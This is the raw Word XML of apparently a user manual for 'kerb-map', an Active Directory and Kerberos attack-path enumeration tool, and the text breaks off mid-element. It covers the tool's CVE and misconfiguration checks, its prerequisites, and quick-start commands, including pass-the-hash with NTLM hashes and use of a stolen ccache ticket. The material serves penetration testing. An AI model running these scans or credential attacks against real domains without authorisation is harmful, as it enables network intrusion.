    <w:p w14:paraId="55DB3C8A" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Finds every AS-REP Roastable account (pre-authentication disabled)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56AE5312" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Maps all three Kerberos delegation types: Unconstrained, Constrained, and RBCD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B5CAAD" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Enumerates privileged users, stale accounts, password policy risks, DnsAdmins, domain trusts, and LAPS status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712D59B0" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Detects known CVEs and misconfigurations: ZeroLogon, noPac, PrintNightmare, PetitPotam, AD CS ESC1-ESC8, MS14-068, GPP Passwords (MS14-025), Bronze Bit (CVE-2020-17049), Certifried (CVE-2022-26923), LDAP Signing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D6A51A" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Cross-correlates all findings into a unified, priority-ranked attack path list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C88D381" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Exports results as JSON or BloodHound-compatible format</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7826B57B" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Stores every scan in a local SQLite cache for historical comparison</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1000003B" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Audits Kerberos encryption types across all accounts and DCs — flags RC4-only and DES configurations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1000003C" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Maps all domain trusts with SID filtering risk assessment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000D23AD" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="131E5E38" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="2471A3"/>
        </w:pBdr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc224561283"/>
      <w:r>
        <w:t>1.2  Philosophy</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="0F1150EE" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>kerb-map is built around three principles:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265A7FA4" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Safe by default — all LDAP queries are read-only. RPC-based CVE probes that generate Windows events are gated behind an explicit --aggressive flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78DF7B4E" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Tell me what to do next — every finding includes the exact next command to run, so there is no gap between enumeration and exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308A46F7" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Don't rebuild what exists — the tool orchestrates impacket, ldap3, and existing protocol libraries rather than reimplementing them. It adds scoring, correlation, and workflow on top.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D12D4C" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC3A5F5" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="2471A3"/>
        </w:pBdr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc224561284"/>
      <w:r>
        <w:t>1.3  Prerequisites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07BE4" w14:paraId="2906DDD2" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="36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4EC290AE" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Requirement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5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19353389" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="36B08973"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7788CF8" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Python 3.10+</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6C4CB1B" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Tested on 3.10, 3.11, 3.12</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="37DE693D"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D95D4EC" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>ldap3</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68163AE6" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>LDAP connection and queries</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="54AB8463"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A782146" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>impacket</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DA16BA6" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Kerberos, RPC, NTLM protocol support</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="71185927"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5302B5F0" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>rich</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A0A8836" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Terminal output and tables</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="3BCDE1D1"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E212FB1" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Network access</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A2F8352" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>TCP 389 (LDAP) to DC. TCP 135 + named pipes for --aggressive RPC checks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="569A82CA"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645CE085" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Domain account</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5A1E4719" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Any valid domain user. Higher-privileged accounts may reveal more data.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="00987121" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7338A81F" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Install all dependencies with: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30EE7DF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F96A2C0" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>pip install -r requirements.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="48622007" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77737D16" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2492BF50" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc224561285"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>2.  Quick Start</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="2CC21F87" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="2471A3"/>
        </w:pBdr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc224561286"/>
      <w:r>
        <w:t>2.1  Basic Scan — Password Authentication</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="2E40521D" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>The minimum required arguments are the target domain, DC IP, username, and one authentication method. This runs all modules except the aggressive RPC-based CVE probes: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77AB8DBC"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49AF4BB" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>python kerb-map.py -d corp.local -dc 192.168.1.10 -u jsmith -p Password123</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0B696368" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651734DE" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="2471A3"/>
        </w:pBdr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc224561287"/>
      <w:r>
        <w:t>2.2  Pass-the-Hash</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="4654094E" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Supply an NTLM hash instead of a plaintext password. Accepts either the full LM:NT format or the NT hash alone (the LM half is automatically padded):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12EB6E12"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0F5DB51" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t># Full LM:NT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="7937305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CEA727E" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>python kerb-map.py -d corp.local -dc 192.168.1.10 -u jsmith \</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="7363E452"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545D75D" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    -H aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="2953871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A3B2050" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="2BE7CBA1"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47231A9" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t># NT hash only (LM auto-padded)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="026509F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67BB1E8" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>python kerb-map.py -d corp.local -dc 192.168.1.10 -u jsmith \</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="391D560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93D20B9" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    -H 31d6cfe0d16ae931b73c59d7e0c089c0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="357A9FB7" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4E0067" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="2471A3"/>
        </w:pBdr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc224561288"/>
      <w:r>
        <w:t>2.3  Kerberos Ticket (ccache)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="17724FDA" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Use a previously obtained Kerberos TGT. Point KRB5CCNAME at your ccache file before running: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79183212"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76E2F45" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>export KRB5CCNAME=/tmp/jsmith.ccache</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="00A5B40E"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045CBBC" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>python kerb-map.py -d corp.local -dc 192.168.1.10 -u jsmith -k</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6FF93EDF" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>This is the natural workflow after performing a Pass-the-Ticket attack using getST.py or ticketer.py from impacket.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47EDDD49" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4F0AAC" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="2471A3"/>
        </w:pBdr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc224561289"/>
      <w:r>
        <w:t>2.4  Full Scan With CVEs and JSON Export</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5DF1B0C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2591118" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>python kerb-map.py -d corp.local -dc 192.168.1.10 -u jsmith -p Password123 \</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="654E69D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C1824F4" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    --all --cves --aggressive -o json</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0C4089EC"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707BE4" w14:paraId="6065B3A4" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="BDC3C7"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="BDC3C7"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="BDC3C7"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="BDC3C7"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C0392B"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="22F7EA85" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>WARNING</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7920" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="BDC3C7"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="BDC3C7"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="BDC3C7"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="BDC3C7"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FDEDEC"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="160" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="160" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1BECA43F" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>The --aggressive flag enables RPC-based CVE probes that generate Windows Event IDs 5145 (named pipe access) and Netlogon events on the DC. Only use this flag when your scope explicitly allows noisy testing.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="38A9819B" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59DDE7C8" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:r>
